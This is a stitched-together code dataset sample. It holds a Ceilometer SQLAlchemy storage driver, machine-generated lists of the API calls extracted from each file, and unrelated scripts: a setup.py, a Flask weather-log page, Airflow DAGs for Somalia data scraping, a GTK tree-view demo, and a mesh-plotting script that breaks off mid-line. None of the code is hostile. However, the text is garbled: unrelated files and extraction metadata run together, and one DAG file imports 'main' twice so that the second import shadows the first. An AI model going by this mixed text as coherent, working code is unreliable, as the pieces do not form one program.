        self.session = sqlalchemy_session.get_session(url, conf)
    def upgrade(self, version=None):
        # Run database migrations up to the given (or latest) version.
        migration.db_sync(self.session.get_bind(), version=version)
    def clear(self):
        # Empty every table, children first (reverse dependency order).
        engine = self.session.get_bind()
        for table in reversed(Base.metadata.sorted_tables):
            engine.execute(table.delete())
    def record_metering_data(self, data):
        """Write the data to the backend storage system.

        :param data: a dictionary such as returned by
                     ceilometer.meter.meter_message_from_counter
        """
        if data['source']:
            source = self.session.query(Source).get(data['source'])
            if not source:
                source = Source(id=data['source'])
                self.session.add(source)
        else:
            source = None
        # create/update user && project, add/update their sources list
        # NOTE(review): under Python 3, filter() returns a lazy iterator
        # that is always truthy, so these "if not filter(...)" branches
        # never append -- confirm Python 2 semantics are intended here.
        if data['user_id']:
            user = self.session.merge(User(id=str(data['user_id'])))
            if not filter(lambda x: x.id == source.id, user.sources):
                user.sources.append(source)
        else:
            user = None
        if data['project_id']:
            project = self.session.merge(Project(id=str(data['project_id'])))
            if not filter(lambda x: x.id == source.id, project.sources):
                project.sources.append(source)
        else:
            project = None
        # Record the updated resource metadata
        rmetadata = data['resource_metadata']
        resource = self.session.merge(Resource(id=str(data['resource_id'])))
        if not filter(lambda x: x.id == source.id, resource.sources):
            resource.sources.append(source)
        resource.project = project
        resource.user = user
        # Current metadata being used and when it was last updated.
        resource.resource_metadata = rmetadata
        # autoflush didn't catch this one, requires manual flush
        self.session.flush()
        # Record the raw data for the event.
        meter = Meter(counter_type=data['counter_type'],
                      counter_unit=data['counter_unit'],
                      counter_name=data['counter_name'], resource=resource)
        self.session.add(meter)
        if not filter(lambda x: x.id == source.id, meter.sources):
            meter.sources.append(source)
        meter.project = project
        meter.user = user
        meter.timestamp = data['timestamp']
        meter.resource_metadata = rmetadata
        meter.counter_volume = data['counter_volume']
        meter.message_signature = data['message_signature']
        meter.message_id = data['message_id']
        return
    def get_users(self, source=None):
        """Return an iterable of user id strings.

        :param source: Optional source filter.
        """
        query = self.session.query(User.id)
        if source is not None:
            query = query.filter(User.sources.any(id=source))
        # Each row is a one-element tuple; unwrap lazily.
        return (x[0] for x in query.all())
    def get_projects(self, source=None):
        """Return an iterable of project id strings.

        :param source: Optional source filter.
        """
        query = self.session.query(Project.id)
        if source:
            query = query.filter(Project.sources.any(id=source))
        return (x[0] for x in query.all())
    def get_resources(self, user=None, project=None, source=None,
                      start_timestamp=None, end_timestamp=None,
                      metaquery={}, resource=None):
        """Return an iterable of api_models.Resource instances

        :param user: Optional ID for user that owns the resource.
        :param project: Optional ID for project that owns the resource.
        :param source: Optional source filter.
        :param start_timestamp: Optional modified timestamp start range.
        :param end_timestamp: Optional modified timestamp end range.
        :param metaquery: Optional dict with metadata to match on.
        :param resource: Optional resource filter.
        """
        # NOTE(review): metaquery={} is a mutable default argument; it is
        # never mutated here (only tested for truthiness) so it is harmless,
        # but None would be the conventional default.
        query = self.session.query(Meter,).group_by(Meter.resource_id)
        if user is not None:
            query = query.filter(Meter.user_id == user)
        if source is not None:
            query = query.filter(Meter.sources.any(id=source))
        if start_timestamp:
            query = query.filter(Meter.timestamp >= start_timestamp)
        if end_timestamp:
            query = query.filter(Meter.timestamp < end_timestamp)
        if project is not None:
            query = query.filter(Meter.project_id == project)
        if resource is not None:
            query = query.filter(Meter.resource_id == resource)
        if metaquery:
            raise NotImplementedError('metaquery not implemented')
        for meter in query.all():
            yield api_models.Resource(
                resource_id=meter.resource_id,
                project_id=meter.project_id,
                user_id=meter.user_id,
                metadata=meter.resource_metadata,
                meter=[
                    api_models.ResourceMeter(
                        counter_name=m.counter_name,
                        counter_type=m.counter_type,
                        counter_unit=m.counter_unit,
                    )
                    for m in meter.resource.meters
                ],
            )
    def get_meters(self, user=None, project=None, resource=None, source=None,
                   metaquery={}):
        """Return an iterable of api_models.Meter instances

        :param user: Optional ID for user that owns the resource.
        :param project: Optional ID for project that owns the resource.
        :param resource: Optional ID of the resource.
        :param source: Optional source filter.
        :param metaquery: Optional dict with metadata to match on.
        """
        query = self.session.query(Resource)
        if user is not None:
            query = query.filter(Resource.user_id == user)
        if source is not None:
            query = query.filter(Resource.sources.any(id=source))
        if resource:
            query = query.filter(Resource.id == resource)
        if project is not None:
            query = query.filter(Resource.project_id == project)
        # Eager-load each resource's meters to avoid per-row queries below.
        query = query.options(
            sqlalchemy_session.sqlalchemy.orm.joinedload('meters'))
        if metaquery:
            raise NotImplementedError('metaquery not implemented')
        for resource in query.all():
            # Emit each distinct counter name only once per resource.
            meter_names = set()
            for meter in resource.meters:
                if meter.counter_name in meter_names:
                    continue
                meter_names.add(meter.counter_name)
                yield api_models.Meter(
                    name=meter.counter_name,
                    type=meter.counter_type,
                    unit=meter.counter_unit,
                    resource_id=resource.id,
                    project_id=resource.project_id,
                    user_id=resource.user_id,
                )
    def get_samples(self, event_filter):
        """Return an iterable of api_models.Samples
        """
        query = self.session.query(Meter)
        query = make_query_from_filter(query, event_filter,
                                       require_meter=False)
        samples = query.all()
        for s in samples:
            # Remove the id generated by the database when
            # the event was inserted. It is an implementation
            # detail that should not leak outside of the driver.
            yield api_models.Sample(
                # Replace 'sources' with 'source' to meet the caller's
                # expectation, Meter.sources contains one and only one
                # source in the current implementation.
                source=s.sources[0].id,
                counter_name=s.counter_name,
                counter_type=s.counter_type,
                counter_unit=s.counter_unit,
                counter_volume=s.counter_volume,
                user_id=s.user_id,
                project_id=s.project_id,
                resource_id=s.resource_id,
                timestamp=s.timestamp,
                resource_metadata=s.resource_metadata,
                message_id=s.message_id,
                message_signature=s.message_signature,
            )
    def _make_volume_query(self, event_filter, counter_volume_func):
        """Returns complex Meter counter_volume query for max and sum."""
        # Select matching meter ids in a subquery, then aggregate their
        # volumes grouped by resource in the outer query.
        subq = self.session.query(Meter.id)
        subq = make_query_from_filter(subq, event_filter, require_meter=False)
        subq = subq.subquery()
        mainq = self.session.query(Resource.id, counter_volume_func)
        mainq = mainq.join(Meter).group_by(Resource.id)
        return mainq.filter(Meter.id.in_(subq))
    def get_event_interval(self, event_filter):
        """Return the min and max timestamps from samples,
        using the event_filter to limit the samples seen.

        ( datetime.datetime(), datetime.datetime() )
        """
        query = self.session.query(func.min(Meter.timestamp),
                                   func.max(Meter.timestamp))
        query = make_query_from_filter(query, event_filter)
        results = query.all()
        a_min, a_max = results[0]
        return (a_min, a_max)
    def _make_stats_query(self, event_filter):
        # One aggregate row: time span plus volume statistics, labelled so
        # _stats_result_to_model can read them by attribute.
        query = self.session.query(
            func.min(Meter.timestamp).label('tsmin'),
            func.max(Meter.timestamp).label('tsmax'),
            func.avg(Meter.counter_volume).label('avg'),
            func.sum(Meter.counter_volume).label('sum'),
            func.min(Meter.counter_volume).label('min'),
            func.max(Meter.counter_volume).label('max'),
            func.count(Meter.counter_volume).label('count'))
        return make_query_from_filter(query, event_filter)
    @staticmethod
    def _stats_result_to_model(result, period, period_start, period_end):
        # Convert one aggregate row into an api_models.Statistics object.
        duration = (timeutils.delta_seconds(result.tsmin, result.tsmax)
                    if result.tsmin is not None and result.tsmax is not None
                    else None)
        return api_models.Statistics(
            count=int(result.count),
            min=result.min,
            max=result.max,
            avg=result.avg,
            sum=result.sum,
            duration_start=result.tsmin,
            duration_end=result.tsmax,
            duration=duration,
            period=period,
            period_start=period_start,
            period_end=period_end,
        )
    def get_meter_statistics(self, event_filter, period=None):
        """Return an iterable of api_models.Statistics instances containing
        meter statistics described by the query parameters.

        The filter must have a meter value set.
        """
        if not period or not event_filter.start or not event_filter.end:
            res = self._make_stats_query(event_filter).all()[0]
        if not period:
            yield self._stats_result_to_model(res, 0, res.tsmin, res.tsmax)
            return
        query = self._make_stats_query(event_filter)
        # HACK(jd) This is an awful method to compute stats by period, but
        # since we're trying to be SQL agnostic we have to write portable
        # code, so here it is, admire! We're going to do one request to get
        # stats by period. We would like to use GROUP BY, but there's no
        # portable way to manipulate timestamp in SQL, so we can't.
        # NOTE(review): `res` is only defined when the first branch above
        # ran; the `or` below short-circuits before touching res when
        # event_filter.start/end are set, so no NameError -- fragile though.
        for period_start, period_end in base.iter_period(
                event_filter.start or res.tsmin,
                event_filter.end or res.tsmax,
                period):
            q = query.filter(Meter.timestamp >= period_start)
            q = q.filter(Meter.timestamp < period_end)
            r = q.all()[0]
            # Don't return results that didn't have any event
            if r.count:
                yield self._stats_result_to_model(
                    result=r,
                    period=int(timeutils.delta_seconds(period_start,
                                                       period_end)),
                    period_start=period_start,
                    period_end=period_end,
                )
|
[
"sqlalchemy.func.sum",
"ceilometer.storage.sqlalchemy.models.Meter.sources.any",
"ceilometer.openstack.common.timeutils.delta_seconds",
"ceilometer.storage.sqlalchemy.models.Meter",
"ceilometer.storage.sqlalchemy.session.get_session",
"ceilometer.storage.sqlalchemy.models.Resource.sources.any",
"ceilometer.storage.sqlalchemy.models.User.sources.any",
"ceilometer.storage.base.iter_period",
"sqlalchemy.func.min",
"ceilometer.storage.models.ResourceMeter",
"ceilometer.storage.sqlalchemy.models.Meter.id.in_",
"sqlalchemy.func.avg",
"ceilometer.storage.sqlalchemy.models.Project.sources.any",
"sqlalchemy.func.max",
"ceilometer.openstack.common.log.getLogger",
"ceilometer.storage.models.Sample",
"ceilometer.storage.sqlalchemy.session.sqlalchemy.orm.joinedload",
"ceilometer.storage.sqlalchemy.models.Source",
"ceilometer.storage.models.Meter",
"os.environ.get",
"sqlalchemy.func.count"
] |
[((1206, 1229), 'ceilometer.openstack.common.log.getLogger', 'log.getLogger', (['__name__'], {}), '(__name__)\n', (1219, 1229), False, 'from ceilometer.openstack.common import log\n'), ((4592, 4633), 'ceilometer.storage.sqlalchemy.session.get_session', 'sqlalchemy_session.get_session', (['url', 'conf'], {}), '(url, conf)\n', (4622, 4633), True, 'import ceilometer.storage.sqlalchemy.session as sqlalchemy_session\n'), ((6605, 6738), 'ceilometer.storage.sqlalchemy.models.Meter', 'Meter', ([], {'counter_type': "data['counter_type']", 'counter_unit': "data['counter_unit']", 'counter_name': "data['counter_name']", 'resource': 'resource'}), "(counter_type=data['counter_type'], counter_unit=data['counter_unit'],\n counter_name=data['counter_name'], resource=resource)\n", (6610, 6738), False, 'from ceilometer.storage.sqlalchemy.models import Meter, Project, Resource\n'), ((16056, 16149), 'ceilometer.storage.base.iter_period', 'base.iter_period', (['(event_filter.start or res.tsmin)', '(event_filter.end or res.tsmax)', 'period'], {}), '(event_filter.start or res.tsmin, event_filter.end or res.\n tsmax, period)\n', (16072, 16149), False, 'from ceilometer.storage import base\n'), ((3622, 3663), 'ceilometer.storage.sqlalchemy.models.Meter.sources.any', 'Meter.sources.any', ([], {'id': 'event_filter.source'}), '(id=event_filter.source)\n', (3639, 3663), False, 'from ceilometer.storage.sqlalchemy.models import Meter, Project, Resource\n'), ((4480, 4526), 'os.environ.get', 'os.environ.get', (['"""CEILOMETER_TEST_SQL_URL"""', 'url'], {}), "('CEILOMETER_TEST_SQL_URL', url)\n", (4494, 4526), False, 'import os\n'), ((10853, 10907), 'ceilometer.storage.sqlalchemy.session.sqlalchemy.orm.joinedload', 'sqlalchemy_session.sqlalchemy.orm.joinedload', (['"""meters"""'], {}), "('meters')\n", (10897, 10907), True, 'import ceilometer.storage.sqlalchemy.session as sqlalchemy_session\n'), ((13325, 13343), 'ceilometer.storage.sqlalchemy.models.Meter.id.in_', 'Meter.id.in_', (['subq'], {}), 
'(subq)\n', (13337, 13343), False, 'from ceilometer.storage.sqlalchemy.models import Meter, Project, Resource\n'), ((13612, 13637), 'sqlalchemy.func.min', 'func.min', (['Meter.timestamp'], {}), '(Meter.timestamp)\n', (13620, 13637), False, 'from sqlalchemy import func\n'), ((13674, 13699), 'sqlalchemy.func.max', 'func.max', (['Meter.timestamp'], {}), '(Meter.timestamp)\n', (13682, 13699), False, 'from sqlalchemy import func\n'), ((14509, 14560), 'ceilometer.openstack.common.timeutils.delta_seconds', 'timeutils.delta_seconds', (['result.tsmin', 'result.tsmax'], {}), '(result.tsmin, result.tsmax)\n', (14532, 14560), False, 'from ceilometer.openstack.common import timeutils\n'), ((5285, 5310), 'ceilometer.storage.sqlalchemy.models.Source', 'Source', ([], {'id': "data['source']"}), "(id=data['source'])\n", (5291, 5310), False, 'from ceilometer.storage.sqlalchemy.models import Source, User, Base\n'), ((7498, 7525), 'ceilometer.storage.sqlalchemy.models.User.sources.any', 'User.sources.any', ([], {'id': 'source'}), '(id=source)\n', (7514, 7525), False, 'from ceilometer.storage.sqlalchemy.models import Source, User, Base\n'), ((7824, 7854), 'ceilometer.storage.sqlalchemy.models.Project.sources.any', 'Project.sources.any', ([], {'id': 'source'}), '(id=source)\n', (7843, 7854), False, 'from ceilometer.storage.sqlalchemy.models import Meter, Project, Resource\n'), ((8823, 8851), 'ceilometer.storage.sqlalchemy.models.Meter.sources.any', 'Meter.sources.any', ([], {'id': 'source'}), '(id=source)\n', (8840, 8851), False, 'from ceilometer.storage.sqlalchemy.models import Meter, Project, Resource\n'), ((10601, 10632), 'ceilometer.storage.sqlalchemy.models.Resource.sources.any', 'Resource.sources.any', ([], {'id': 'source'}), '(id=source)\n', (10621, 10632), False, 'from ceilometer.storage.sqlalchemy.models import Meter, Project, Resource\n'), ((12110, 12489), 'ceilometer.storage.models.Sample', 'api_models.Sample', ([], {'source': 's.sources[0].id', 'counter_name': 
's.counter_name', 'counter_type': 's.counter_type', 'counter_unit': 's.counter_unit', 'counter_volume': 's.counter_volume', 'user_id': 's.user_id', 'project_id': 's.project_id', 'resource_id': 's.resource_id', 'timestamp': 's.timestamp', 'resource_metadata': 's.resource_metadata', 'message_id': 's.message_id', 'message_signature': 's.message_signature'}), '(source=s.sources[0].id, counter_name=s.counter_name,\n counter_type=s.counter_type, counter_unit=s.counter_unit,\n counter_volume=s.counter_volume, user_id=s.user_id, project_id=s.\n project_id, resource_id=s.resource_id, timestamp=s.timestamp,\n resource_metadata=s.resource_metadata, message_id=s.message_id,\n message_signature=s.message_signature)\n', (12127, 12489), True, 'from ceilometer.storage import models as api_models\n'), ((11267, 11451), 'ceilometer.storage.models.Meter', 'api_models.Meter', ([], {'name': 'meter.counter_name', 'type': 'meter.counter_type', 'unit': 'meter.counter_unit', 'resource_id': 'resource.id', 'project_id': 'resource.project_id', 'user_id': 'resource.user_id'}), '(name=meter.counter_name, type=meter.counter_type, unit=\n meter.counter_unit, resource_id=resource.id, project_id=resource.\n project_id, user_id=resource.user_id)\n', (11283, 11451), True, 'from ceilometer.storage import models as api_models\n'), ((13951, 13976), 'sqlalchemy.func.min', 'func.min', (['Meter.timestamp'], {}), '(Meter.timestamp)\n', (13959, 13976), False, 'from sqlalchemy import func\n'), ((14005, 14030), 'sqlalchemy.func.max', 'func.max', (['Meter.timestamp'], {}), '(Meter.timestamp)\n', (14013, 14030), False, 'from sqlalchemy import func\n'), ((14059, 14089), 'sqlalchemy.func.avg', 'func.avg', (['Meter.counter_volume'], {}), '(Meter.counter_volume)\n', (14067, 14089), False, 'from sqlalchemy import func\n'), ((14116, 14146), 'sqlalchemy.func.sum', 'func.sum', (['Meter.counter_volume'], {}), '(Meter.counter_volume)\n', (14124, 14146), False, 'from sqlalchemy import func\n'), ((14173, 14203), 
'sqlalchemy.func.min', 'func.min', (['Meter.counter_volume'], {}), '(Meter.counter_volume)\n', (14181, 14203), False, 'from sqlalchemy import func\n'), ((14230, 14260), 'sqlalchemy.func.max', 'func.max', (['Meter.counter_volume'], {}), '(Meter.counter_volume)\n', (14238, 14260), False, 'from sqlalchemy import func\n'), ((14287, 14319), 'sqlalchemy.func.count', 'func.count', (['Meter.counter_volume'], {}), '(Meter.counter_volume)\n', (14297, 14319), False, 'from sqlalchemy import func\n'), ((9621, 9737), 'ceilometer.storage.models.ResourceMeter', 'api_models.ResourceMeter', ([], {'counter_name': 'm.counter_name', 'counter_type': 'm.counter_type', 'counter_unit': 'm.counter_unit'}), '(counter_name=m.counter_name, counter_type=m.\n counter_type, counter_unit=m.counter_unit)\n', (9645, 9737), True, 'from ceilometer.storage import models as api_models\n'), ((16537, 16586), 'ceilometer.openstack.common.timeutils.delta_seconds', 'timeutils.delta_seconds', (['period_start', 'period_end'], {}), '(period_start, period_end)\n', (16560, 16586), False, 'from ceilometer.openstack.common import timeutils\n')]
|
from setuptools import setup, find_packages
with open('README.md') as f:
readme = f.read()
setup(
name='plaza_routing',
version='0.0.1',
description='Plaza routing service for plazaroute',
long_description=readme,
author='<NAME>, <NAME>',
author_email='<EMAIL>',
url='https://github.com/PlazaRoute/plazaroute',
license="MIT License",
packages=find_packages(exclude=('tests', 'docs')),
package_data={'': ['integration/routing_strategy/graphhopper_swagger.json']}
)
|
[
"setuptools.find_packages"
] |
[((387, 427), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "('tests', 'docs')"}), "(exclude=('tests', 'docs'))\n", (400, 427), False, 'from setuptools import setup, find_packages\n')]
|
from flask import Flask, render_template, request, url_for
from datetime import datetime
from readWeather import readWeather
app = Flask(__name__)
@app.route("/", methods=['GET', 'POST'])
def print_form():
now = datetime.now()
timeString = now.strftime("%Y-%m-%d %H:%M")
templateData = {
'title' : 'Humidity and Temperature Log',
'time' : timeString
}
if request.method == 'POST':
readW = readWeather('humidity_temp_log.h5')
result=request.form['fooput']
readW.generatePlot(result)
filename1 = 'temp_humid_' + result + '.png'
return render_template('form.html',result=result, filename1=filename1, **templateData)
if request.method == 'GET':
#filename1 = 'temp.png'
return render_template("form.html", **templateData)
if __name__ == "__main__":
#app.run(host='0.0.0.0', debug=True)
app.run(host='192.168.0.24', port=5000, debug=False)
|
[
"flask.Flask",
"datetime.datetime.now",
"readWeather.readWeather",
"flask.render_template"
] |
[((131, 146), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (136, 146), False, 'from flask import Flask, render_template, request, url_for\n'), ((219, 233), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (231, 233), False, 'from datetime import datetime\n'), ((448, 483), 'readWeather.readWeather', 'readWeather', (['"""humidity_temp_log.h5"""'], {}), "('humidity_temp_log.h5')\n", (459, 483), False, 'from readWeather import readWeather\n'), ((624, 709), 'flask.render_template', 'render_template', (['"""form.html"""'], {'result': 'result', 'filename1': 'filename1'}), "('form.html', result=result, filename1=filename1, **templateData\n )\n", (639, 709), False, 'from flask import Flask, render_template, request, url_for\n'), ((783, 827), 'flask.render_template', 'render_template', (['"""form.html"""'], {}), "('form.html', **templateData)\n", (798, 827), False, 'from flask import Flask, render_template, request, url_for\n')]
|
from datetime import datetime
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.python_operator import PythonOperator
from somalia.form.main import main
from somalia.form.somalia_form_data import run_form_data_scraping
from somalia.gsheets.somalia_sheet import main
from utils.dags import default_args
from utils.debugger import enable_cloud_debugger
enable_cloud_debugger()
####################
# CONFIRMED SCRIPT #
####################
somalia_confirmed_data_dag = DAG(
dag_id='somalia-confirmed',
start_date=datetime(2020, 4, 22),
schedule_interval='15 4,16 * * *', # 15 minutes past hour 4 and 16.
default_args=default_args,
catchup=True
)
echo_confirmed = BashOperator(
task_id='Echo',
bash_command='echo "Getting Somalia Confirmed Data"'
)
run_confirmed_service = PythonOperator(
task_id='get_somalia_confirmed_data',
python_callable=main,
dag=somalia_confirmed_data_dag
)
####################
# FORM SCRIPT #
####################
somalia_form_data_dag = DAG(
dag_id='somalia-form',
start_date=datetime(2020, 4, 25),
schedule_interval='0 * * * *', # every hour
default_args=default_args,
catchup=True
)
echo_form = BashOperator(
task_id='Echo',
bash_command='echo "Getting Somalia Form Data"'
)
run_form_service = PythonOperator(
task_id='get_somalia_form_data',
python_callable=run_form_data_scraping,
dag=somalia_form_data_dag
)
####################
# SHEETS SCRIPT #
####################
somalia_sheets_upload = DAG(
dag_id='somalia-sheets-upload',
start_date=datetime(2020, 4, 25),
schedule_interval='5 * * * *', # 5 minutes past every hour
default_args=default_args,
catchup=True
)
echo_sheet = BashOperator(
task_id='Echo',
bash_command='echo "Getting Somalia Form Data"'
)
upload_sheet = PythonOperator(
task_id='upload-to-sheets',
python_callable=main,
dag=somalia_sheets_upload
)
# Three separate DAGs since none are dependant on the other
# Start times are offset to not overload the instances
echo_confirmed >> run_confirmed_service
echo_form >> run_form_service
echo_sheet >> upload_sheet
|
[
"airflow.operators.bash_operator.BashOperator",
"utils.debugger.enable_cloud_debugger",
"airflow.operators.python_operator.PythonOperator",
"datetime.datetime"
] |
[((409, 432), 'utils.debugger.enable_cloud_debugger', 'enable_cloud_debugger', ([], {}), '()\n', (430, 432), False, 'from utils.debugger import enable_cloud_debugger\n'), ((743, 830), 'airflow.operators.bash_operator.BashOperator', 'BashOperator', ([], {'task_id': '"""Echo"""', 'bash_command': '"""echo "Getting Somalia Confirmed Data\\""""'}), '(task_id=\'Echo\', bash_command=\n \'echo "Getting Somalia Confirmed Data"\')\n', (755, 830), False, 'from airflow.operators.bash_operator import BashOperator\n'), ((861, 971), 'airflow.operators.python_operator.PythonOperator', 'PythonOperator', ([], {'task_id': '"""get_somalia_confirmed_data"""', 'python_callable': 'main', 'dag': 'somalia_confirmed_data_dag'}), "(task_id='get_somalia_confirmed_data', python_callable=main,\n dag=somalia_confirmed_data_dag)\n", (875, 971), False, 'from airflow.operators.python_operator import PythonOperator\n'), ((1252, 1329), 'airflow.operators.bash_operator.BashOperator', 'BashOperator', ([], {'task_id': '"""Echo"""', 'bash_command': '"""echo "Getting Somalia Form Data\\""""'}), '(task_id=\'Echo\', bash_command=\'echo "Getting Somalia Form Data"\')\n', (1264, 1329), False, 'from airflow.operators.bash_operator import BashOperator\n'), ((1360, 1479), 'airflow.operators.python_operator.PythonOperator', 'PythonOperator', ([], {'task_id': '"""get_somalia_form_data"""', 'python_callable': 'run_form_data_scraping', 'dag': 'somalia_form_data_dag'}), "(task_id='get_somalia_form_data', python_callable=\n run_form_data_scraping, dag=somalia_form_data_dag)\n", (1374, 1479), False, 'from airflow.operators.python_operator import PythonOperator\n'), ((1784, 1861), 'airflow.operators.bash_operator.BashOperator', 'BashOperator', ([], {'task_id': '"""Echo"""', 'bash_command': '"""echo "Getting Somalia Form Data\\""""'}), '(task_id=\'Echo\', bash_command=\'echo "Getting Somalia Form Data"\')\n', (1796, 1861), False, 'from airflow.operators.bash_operator import BashOperator\n'), ((1888, 1984), 
'airflow.operators.python_operator.PythonOperator', 'PythonOperator', ([], {'task_id': '"""upload-to-sheets"""', 'python_callable': 'main', 'dag': 'somalia_sheets_upload'}), "(task_id='upload-to-sheets', python_callable=main, dag=\n somalia_sheets_upload)\n", (1902, 1984), False, 'from airflow.operators.python_operator import PythonOperator\n'), ((579, 600), 'datetime.datetime', 'datetime', (['(2020)', '(4)', '(22)'], {}), '(2020, 4, 22)\n', (587, 600), False, 'from datetime import datetime\n'), ((1117, 1138), 'datetime.datetime', 'datetime', (['(2020)', '(4)', '(25)'], {}), '(2020, 4, 25)\n', (1125, 1138), False, 'from datetime import datetime\n'), ((1633, 1654), 'datetime.datetime', 'datetime', (['(2020)', '(4)', '(25)'], {}), '(2020, 4, 25)\n', (1641, 1654), False, 'from datetime import datetime\n')]
|
# -*- coding: utf-8 -*-
"""Gtk.TreeView(), Gtk.TreeStore()."""
import gi
gi.require_version(namespace='Gtk', version='3.0')
from gi.repository import Gtk
class Handler:
brazilian_cities = {
'SP': ['Botucatu', 'São Manuel'],
'SC': ['Florianópolis', 'Joinville']
}
def __init__(self):
# Acessando o `Gtk.ListStore()`.
tree_store = builder.get_object(name='tree_store')
for state, cities_list in self.brazilian_cities.items():
iter = tree_store.append(parent=None, row=[state])
for city in cities_list:
tree_store.append(parent=iter, row=[city])
def on_row_double_click(self, widget, tree_path, tree_view_column):
model = widget.get_model()
print(model)
tree_iter = model.get_iter(tree_path)
print(tree_iter)
column = tree_view_column.get_sort_column_id()
print(column)
column_title = tree_view_column.get_title()
print(column_title)
print(f'Coluna: {column} - Título: {column_title}')
value = model.get_value(iter=tree_iter, column=column)
print(f'Texto da linha {value}')
if __name__ == '__main__':
builder = Gtk.Builder.new()
builder.add_from_file(filename='MainWindow.glade')
builder.connect_signals(obj_or_map=Handler())
win = builder.get_object(name='MainWindow')
win.connect('destroy', Gtk.main_quit)
win.show_all()
Gtk.main()
|
[
"gi.repository.Gtk.Builder.new",
"gi.require_version",
"gi.repository.Gtk.main"
] |
[((75, 125), 'gi.require_version', 'gi.require_version', ([], {'namespace': '"""Gtk"""', 'version': '"""3.0"""'}), "(namespace='Gtk', version='3.0')\n", (93, 125), False, 'import gi\n'), ((1207, 1224), 'gi.repository.Gtk.Builder.new', 'Gtk.Builder.new', ([], {}), '()\n', (1222, 1224), False, 'from gi.repository import Gtk\n'), ((1444, 1454), 'gi.repository.Gtk.main', 'Gtk.main', ([], {}), '()\n', (1452, 1454), False, 'from gi.repository import Gtk\n')]
|
# -*- coding: utf-8; -*-
import pathlib
import matplotlib.pyplot as plt
import dolfin
from extrafeathers import meshfunction
from extrafeathers import meshiowrapper
from extrafeathers import plotmagic
print(pathlib.Path.cwd())
meshiowrapper.import_gmsh(src="demo/meshes/box.msh",
dst="demo/meshes/box.h5") # for use by the flow solvers
mesh, domain_parts, boundary_parts = meshiowrapper.read_hdf5_mesh("demo/meshes/box.h5")
# Visualize the fluid mesh
plt.figure(1)
plt.clf()
# mesh itself
plt.subplot(2, 2, 1)
dolfin.plot(mesh)
plt.ylabel("Mesh")
# local mesh size
plt.subplot(2, 2, 2)
theplot = dolfin.plot(meshfunction.meshsize(mesh))
plt.colorbar(theplot)
plt.ylabel("Local mesh size")
# domain parts (subdomains)
plt.subplot(2, 2, 3)
theplot = dolfin.plot(domain_parts)
plt.colorbar(theplot)
plt.ylabel("Phys. surfaces")
# boundary parts
plt.subplot(2, 2, 4)
plotmagic.plot_facet_meshfunction(boundary_parts, invalid_values=[2**64 - 1])
plt.axis("scaled")
plt.legend(loc="best")
plt.ylabel("Phys. boundaries")
plt.suptitle("Structure")
plt.show()
|
[
"extrafeathers.meshiowrapper.import_gmsh",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.show",
"extrafeathers.plotmagic.plot_facet_meshfunction",
"matplotlib.pyplot.clf",
"matplotlib.pyplot.suptitle",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.axis",
"dolfin.plot",
"matplotlib.pyplot.colorbar",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.ylabel",
"pathlib.Path.cwd",
"extrafeathers.meshfunction.meshsize",
"extrafeathers.meshiowrapper.read_hdf5_mesh"
] |
[((233, 311), 'extrafeathers.meshiowrapper.import_gmsh', 'meshiowrapper.import_gmsh', ([], {'src': '"""demo/meshes/box.msh"""', 'dst': '"""demo/meshes/box.h5"""'}), "(src='demo/meshes/box.msh', dst='demo/meshes/box.h5')\n", (258, 311), False, 'from extrafeathers import meshiowrapper\n'), ((406, 456), 'extrafeathers.meshiowrapper.read_hdf5_mesh', 'meshiowrapper.read_hdf5_mesh', (['"""demo/meshes/box.h5"""'], {}), "('demo/meshes/box.h5')\n", (434, 456), False, 'from extrafeathers import meshiowrapper\n'), ((485, 498), 'matplotlib.pyplot.figure', 'plt.figure', (['(1)'], {}), '(1)\n', (495, 498), True, 'import matplotlib.pyplot as plt\n'), ((499, 508), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (506, 508), True, 'import matplotlib.pyplot as plt\n'), ((524, 544), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(2)', '(1)'], {}), '(2, 2, 1)\n', (535, 544), True, 'import matplotlib.pyplot as plt\n'), ((545, 562), 'dolfin.plot', 'dolfin.plot', (['mesh'], {}), '(mesh)\n', (556, 562), False, 'import dolfin\n'), ((563, 581), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Mesh"""'], {}), "('Mesh')\n", (573, 581), True, 'import matplotlib.pyplot as plt\n'), ((601, 621), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(2)', '(2)'], {}), '(2, 2, 2)\n', (612, 621), True, 'import matplotlib.pyplot as plt\n'), ((673, 694), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['theplot'], {}), '(theplot)\n', (685, 694), True, 'import matplotlib.pyplot as plt\n'), ((695, 724), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Local mesh size"""'], {}), "('Local mesh size')\n", (705, 724), True, 'import matplotlib.pyplot as plt\n'), ((754, 774), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(2)', '(3)'], {}), '(2, 2, 3)\n', (765, 774), True, 'import matplotlib.pyplot as plt\n'), ((785, 810), 'dolfin.plot', 'dolfin.plot', (['domain_parts'], {}), '(domain_parts)\n', (796, 810), False, 'import dolfin\n'), ((811, 832), 'matplotlib.pyplot.colorbar', 'plt.colorbar', 
